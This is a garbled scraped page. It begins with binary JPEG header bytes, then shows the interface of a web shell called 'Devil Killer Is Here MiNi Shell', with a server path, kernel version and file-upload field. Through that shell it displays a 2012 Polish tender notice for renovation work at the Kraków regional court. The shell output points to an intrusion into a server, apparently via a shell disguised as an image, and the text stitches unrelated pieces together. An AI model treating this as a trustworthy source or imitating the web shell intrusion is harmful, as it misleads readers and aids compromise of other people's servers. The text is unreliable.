JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121008/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121008/214117-N-2012.html

<p class="kh_header"><b>Kraków: Remont w pomieszczeniach biurowych i korytarzach w kompleksie budynków Sądu Okręgowego w Krakowie</b><br>
<b>Numer ogłoszenia: 214117 - 2012; data zamieszczenia: 08.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Sąd Okręgowy w Krakowie , ul. Przy Rondzie 7, 31-547 Kraków, woj. małopolskie, tel. 012 6195925, faks 012 6195927.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.krakow.so.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont w pomieszczeniach biurowych i korytarzach w kompleksie budynków Sądu Okręgowego w Krakowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1- Przedmiotem zamówienia jest: remont w pomieszczeniach biurowych i korytarzach w kompleksie budynków Sądu Okręgowego w Krakowie, zgodnie ze szczegółowym opisem zawartym w SIWZ. 
/CPV: 45400000-1, 45440000-3, 45432114-6, 44621112-7, 45262900-0, 45211310-5/.

Wielkość (zakres) zamówienia: 

Renowacja parkietów w pomieszczeniach pawilonu K.
Prace remontowe polegać będą na cyklinowaniu i lakierowaniu istniejącego parkietu, łącznie z wymianą dębowych listew przyściennych, rozetek maskujących mocowania nóżek grzejników do posadzki oraz rozetek maskujących przejścia miedzianych rur c.o. przez ściany i posadzkę .
Cyklinowanie parkietu należy wykonać metodą bezpyłową. Parkiet należy polakierować farbami ekologicznymi, umożliwiającymi przejęcie do zasiedlenia do normalnej pracy przez pracowników Zamawiającego już po 7 dniach od dnia przekazania pomieszczenia Wykonawcy. Realizacja prac ma się odbywać w grupach 4-5 pomieszczeń. 
W zakresie wykonawcy jest wyniesienie mebli, zabezpieczenie ścian oraz elementów wyposażenia stałego m.in. lampy, czujki p.poż., wykonanie renowacji parkietu z wymianą listew przyściennych , wniesienie mebli oraz doprowadzenie pomieszczenia do stanu pierwotnego. Renowację posadzek należy przeprowadzić w następujących pomieszczeniach : K-602, K-610, K-315, K-314, K-313, K-521, K-411, K-405, K-401, K-420, K-425, K-422, K-423, K-424, K-312, K-325, sala konferencyjna na V piętrze pawilonu K. 
Termin realizacji prac ma przebiegać zgodnie z załączonym szczegółowym harmonogramem cyklinowania pomieszczeń.

Prace malarskie. 
Zakres prac malarskich obejmuje renowację powłok malarskich pomieszczeń K-22, K-19 i korytarzy na kondygnacjach -2, -1, 0, 1, 2  oraz klatki schodowej od strony zachodniej, w pawilonie K, w kompleksie budynków Sądu Okręgowego w Krakowie, ul. Przy Rondzie 7, a także korytarzy na piętrach 3, 4, 5, 6, 7, w budynku biurowym przy ul. Przy Rondzie 6 .  
Zakres prac malarskich:
1. Zabezpieczenie posadzek oraz wyposażenia znajdującego się w pokojach biurowych, wynoszenie mebli. 
2. Przygotowanie powierzchni  ścian i sufitów do malowania z poszpachlowaniem nierówności i ubytków powierzchni. 
3. Malowanie farbami emulsyjnymi akrylowymi ścian wewnętrznych i  sufitów. 
4. Mycie po robotach malarskich, sprzątanie, wnoszenie mebli.
Minimalne dane techniczne dotyczące farby emulsyjnej akrylowej:
Kolor: biały,
Stopień połysku: matowy,
Bazowy środek wiążący: dyspersja akrylowa, spoiwo kopolimerowe lub równoważne,
Gęstość:  ok. 1,5 kg/dm3 + 0,1,
Odporność na szorowanie: farba klasy I (wg normy PN-C-1914;2002) o wysokiej odporności na zmywanie i szorowanie.
System: wszystkie materiały i sprzęt użyty do wykonania zadania muszą być zgodne z przyjętym przez wykonawcę systemem realizacji, wg wymogów producenta.

Remont sanitariatu C- 39.
Prace remontowe w pomieszczeniu wc będą polegały na demontażu istniejącej posadzki gresowej oraz wylewki, wykonaniu wylewki cementowej z uszczelnieniem płynna folią (wraz z taśmą uszczelniającą w narożnikach) z wymianą wpustu podłogowego, oraz ułożeniu płytek gresowych łącznie z dolnym pasem płytek ściennych (płytki gresowe o ścieralności wgłębnej mniejszej niż 130 mm3, klasa antypoślizgowości R10, gatunek 1, typ powierzchni natura). W pomieszczeniu wc należy  zamontować przepływowy podgrzewacz wody łącznie z baterią umywalkową oraz wentylator ścienny z podłączeniem do oświetlenia, z kratką, na istniejącycm przewodzie wentylacyjnym. Należy również wymienić skrzydło drzwiowe oraz 3 komplety klamek (w drzwiach wc, oraz dwóch sąsiednich). Pozostałe powierzchnie ścian i sufitów należy przemalować farbą emulsyjną akrylową w kolorze białym.

Wykonanie otworów w ścianie zewnętrznej do odprowadzenia ciepłego powietrza z przenośnych jednostek klimatyzacyjnych.
Otwory do odprowadzenia ciepłego powietrza z przenośnych jednostek klimatyzacyjnych w ścianie zewnętrznej  należy wykonać o średnicy 120 mm, w linii poziomej, z zachowaniem wysokości istniejących już otworów i zaopatrzyć w anemostaty od zewnątrz i wewnątrz pomieszczenia, oraz korek styropianowy o grubości 20 cm, zamykające dopływ chłodnego powietrza w okresie zimowym.  Po wykonaniu otworu należy przewidzieć naprawę tynku i powłoki malarskiej, na zewnątrz i wewnątrz pomieszczenia. 
Otwory pod montaż klimatyzatorów przenośnych należy wykonać w następujących pomieszczeniach: E-202, B-2, B-3, B-4, B-5, A-105, A-105A, A-106, A-109, A-112, A-113, A-116, A-117, A-119, A-120, A-122, A-123, A-5, C-35, C-36, C-33, C-31, C-32, C-29, C-30.

Wymiana zaworów termostatycznych.
Należy wymienić zawory grzejnikowe o średnicy ? cala oraz zamontować odpowietrzniki indywidualne dla każdego grzejnika. Zasilanie - należy zamontować zawór z głowicą termostatyczną umożliwiającą regulację nastawów przepływu czynnika grzewczego. Powrót - należy zamontować zawór umożliwiający demontaż grzejnika. Należy wymienić (napy) górne grzejników z zamontowanymi odpowietrznikami.  
Powyższe prace należy wykonać  w  13 pomieszczeniach biurowych w pawilonie C, poziom 0: pomieszczenia od C-1 do C-12. W cenie oferty należy uwzględnić demontaż i ponowny montaż grzejników żeliwnych, a także spuszczenie wody z instalacji oraz jej ponowne uruchomienie z odpowietrzeniem.

Naprawa posadzki w długim patio w pawilonie K, poziom -1, oraz taras przy pokojach gościnnych. 
Prace w długim patio będą polegały na demontażu istniejącej posadzki z płytek podłogowych na długości 53 m i szerokości 70 cm oraz cokołu, wylewki cementowej na siatce Rabitza, folii PE, styropianu, a następnie  odbudowaniu tych warstw, zgodnie z zakresem podanym w przedmiarze. Płytki ceramiczne należy dopasować do istniejących.
PRZEKRÓJ POSADZKI: rysunek w załączniku.
Na balkonie przynależącym do pokoi gościnnych o wymiarach 13,50m x1,30 m należy ułożyć płytki gresowe mrozoodporne o wymiarach 30x30 cm, przy uzyciu kleju i masy fugowej, spełniających warunki mrozoodporności, wraz z warstwą izolacyjną wykonaną z folii w płynie i cokoliki przyścienne, mrozoodporne o wysokości 15 cm. Należy również przemalować balustradę na kolor popielaty.

Wymiana drzwi w pomieszczeniach B-034 i B-035.
W pomieszczeniach B-034 i B-035 należy wymienić drzwi na drzwi antywłamaniowe o odporności na włamanie klasy C według normy PN 90/B-92270. 
Wymogi dot. drzwi:
- okucie - gałko-klamka
- 2 zamki, w tym jeden zamek centralny 6-cio punktowy,
- 2 wkładki drzwiowe, w tym jedna klasy C,
- szerokość skrzydła 80 cm,
- drzwi lewe,
- kolor jasny dąb, 
Prace będą polegały na demontażu istniejących drzwi i ościeżnicy, osadzeniu nowych drzwi, obróbce tynkarskiej, poprawkach malarskich oraz wymianie uszkodzonych płytek gresowych na posadzce. 
	
Wymiana uszkodzonych płytek. 
Należy wymienić uszkodzone płytki gresowe Nowa Gala QZ, z dopasowaniem kolorystycznym, na posadzce  na korytarzach w następujących miejscach:
- pawilon E, 1 piętro, przy przejściu do pawilonu K oraz przy KRK - 2 sztuki (płytka o wymiarze 40x40cm)
- pawilon E wysoki parter przy przejściu do pawilonu B - 1 sztuka ( płytka o wymiarze 40x40cm),
- pawilon E, niski parter - 2 sztuki (płytki o wymiarach 40x40 cm)
- pawilon C, niski parter, wyjście z pawilonu na parking , nastopnice schodowe- 3 sztuki (płytki o wymiarach 30x30cm),
- pawilon A, 1 piętro przy Sali A-111 - 11 sztuk (płytki o wymiarach 30x30 cm),
- pawilon B, niski parter, wyjście z pawilonu na parking, nastopnie schodowe-2 sztuki (płytki o wymiarach 30x30cm).

Montaż kratek wentylacyjnych.
W pomieszczeniu E-023 (szatnia dla policjantek) należy wykonać 4 otwory w ścianie z cegły, gr. 12cm, o wymiarach 17x25cm, a następnie osadzić w nich kratki wentylacyjne PVC - z jednej i drugiej strony pomieszczenia (8 szt).

2- W pierwszej kolejności należy przewidzieć wykonanie prac związanych z ułożeniem płytek na balkonie  oraz wymianą zaworów termostatycznych.
Szczegółowy zakres prac remontowych określony został w przedmiarach. Wszystkie materiały i kolorystyka wymagają przed zamontowaniem akceptacji Zamawiającego.
Wszelkie uszkodzenia i zabrudzenia powłok malarskich ścian i sufitów powstałe przy prowadzeniu prac remontowych muszą być przez wykonawcę naprawione i usunięte na jego koszt. Inwestor zwraca uwagę, że część pomieszczeń jest świeżo malowana.  
3- Wszystkie materiały i kolorystyka wymagają akceptacji Zamawiającego, przed wbudowaniem należy przedstawić próbki. Wskazane parametry techniczne stanowią żądania minimum. Wszystkie wskazane w dokumentacji projektowej nazwy własne i znaki towarowe należy rozmieć jako określenie wymaganych właściwości i standardów jakościowych, a Zamawiający dopuszcza wyroby równoważne o parametrach nie niższych niż te, którymi charakteryzują się wymienione z nazwy w przedmiocie zamówienia. 
4- Wymagany okres gwarancji - minimum 36 m-cy.
5- Zamawiający nie dopuszcza możliwości składania ofert częściowych. Pod uwagę będą brane wyłącznie oferty obejmujące całość zamówienia. Zamawiający nie dopuszcza możliwości składania ofert wariantowych.
6- W niniejszym postępowaniu Zamawiający przewiduje zamówienia uzupełniające, o których mowa w art. 67 ust. 1 pkt 6 ustawy Pzp do 30% wartości zamówienia podstawowego.
7- Miejsce realizacji: 31-547 Kraków, ul. Przy Rondzie 6 i 7. Zaleca się, aby wykonawca na własną odpowiedzialność, ryzyko i koszt, dokonał wizji lokalnej miejsca realizacji przedmiotu zamówienia i zdobył dodatkowe informacje, które mogą być konieczne do przygotowania oferty, zawarcia umowy i wykonania zamówienia.
8- Roboty budowlane prowadzone będą w obiekcie czynnym.  Wykonawca jest zobowiązany prowadzić powyższe prace w sposób umożliwiający pracę Sądu i innych użytkowników obiektu, w tym zapewnić bezpieczny i niezakłócony dostęp stron.  Zamawiający wymaga, aby roboty kolidujące z normalną pracą użytkowników obiektu, były prowadzone po godzinie 15-tej i w soboty.
9- Roboty będą prowadzone zgodnie z harmonogramem zaakceptowanym przez Zamawiającego zgodnie z zapisem umowy. Harmonogram należy przedstawić i uzgodnić z Zamawiającym na 2 dni przed podpisaniem umowy. Wykonawca przyjmuje do wiadomości, że mogą zaistnieć po stronie Zamawiającego sytuacje, w których zobowiązany będzie do odstępstw od harmonogramu, w związku z czym Wykonawca gotowy będzie do elastycznego reagowania na zmiany w harmonogramie i przesuwanie frontu robót lub jego części.
10- Ze względu na charakter pracy Sądu, Zamawiający ma możliwość krótkotrwałego przerwania prac lub czasowego ich ograniczenia, względnie zmiany kolejności.
11- Przed rozpoczęciem wykonywania prac Wykonawca zobowiązany jest każdorazowo oznaczyć i zabezpieczyć przed zniszczeniem lub zanieczyszczeniem teren, na którym odbywać się będą prace. 
12- Wykonawca zobowiązany jest do ciągłego i systematycznego utrzymania czystości terenu, na którym prowadzone są prace..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>W niniejszym postępowaniu Zamawiający przewiduje zamówienia uzupełniające, o których mowa w art. 67 ust. 1 pkt 6 ustawy Pzp do 30% wartości zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.40.00.00-1, 45.44.00.00-3, 45.43.21.14-6, 44.62.11.12-7, 45.26.29.00-0, 45.21.13.10-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 42.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do przetargu jest obowiązany wnieść wadium przed upływem terminu składania ofert w wysokości: 3 000 zł (słownie: trzy tysiące złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.
Zamawiający dokona oceny na podstawie oświadczenia wykonawcy w trybie art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (tekst jednolity Dz. U. z 2010 r. Nr 113, poz. 759 ze zm.)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni powyższy warunek, jeżeli wykaże, że wykonał roboty budowlane w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania, oraz załączy dokument potwierdzający, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. Przez zakres niezbędny rozumie się co najmniej 2 roboty remontowe lub budowlane o wartości minimum 50 000 zł każda.
Ocena spełniania tego warunku nastąpi na podstawie weryfikacji w/w wykazu sporządzonego zgodnie ze wzorem załączonym do SIWZ.
Do wymienionych w wykazie robót Zamawiający żąda załączenia dokumentów potwierdzających, że każda z tych robót została wykonana zgodnie z zasadami sztuki budowlanej i prawidłowo ukończona. Niespełnienie przez Wykonawcę któregokolwiek kryterium oceny spełniania warunku posiadania wiedzy i doświadczenia spowoduje wykluczenie Wykonawcy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.
Zamawiający dokona oceny na podstawie oświadczenia wykonawcy w trybie art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (tekst jednolity Dz. U. z 2010 r. Nr 113, poz. 759 ze zm.)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.
Zamawiający dokona oceny na podstawie oświadczenia wykonawcy w trybie art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (tekst jednolity Dz. U. z 2010 r. Nr 113, poz. 759 ze zm.)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.
Zamawiający dokona oceny na podstawie oświadczenia wykonawcy w trybie art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (tekst jednolity Dz. U. z 2010 r. Nr 113, poz. 759 ze zm.)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) pełnomocnictwo /jeśli dotyczy/ do reprezentowania i podpisania dokumentacji ofertowej, jeżeli Wykonawca jest reprezentowany niezgodnie z zapisem we właściwym rejestrze lub zaświadczeniu o wpisie do ewidencji działalności gospodarczej.
2) pisemne zobowiązanie podmiotów /jeśli dotyczy/ w przypadku, gdy Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Kryterium długości okresu gwarancji - 5</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> tak, adres strony, na której będzie prowadzona: https://aukcje.uzp.gov.pl</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.krakow.so.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Sąd Okręgowy w Krakowie, 31-547 Kraków, ul. Przy Rondzie 7, II p. pok. E-232..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.10.2012 godzina 11:00, miejsce: Sąd Okręgowy w Krakowie, 31-547 Kraków, ul. Przy Rondzie 7, II p. pok. E-232..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





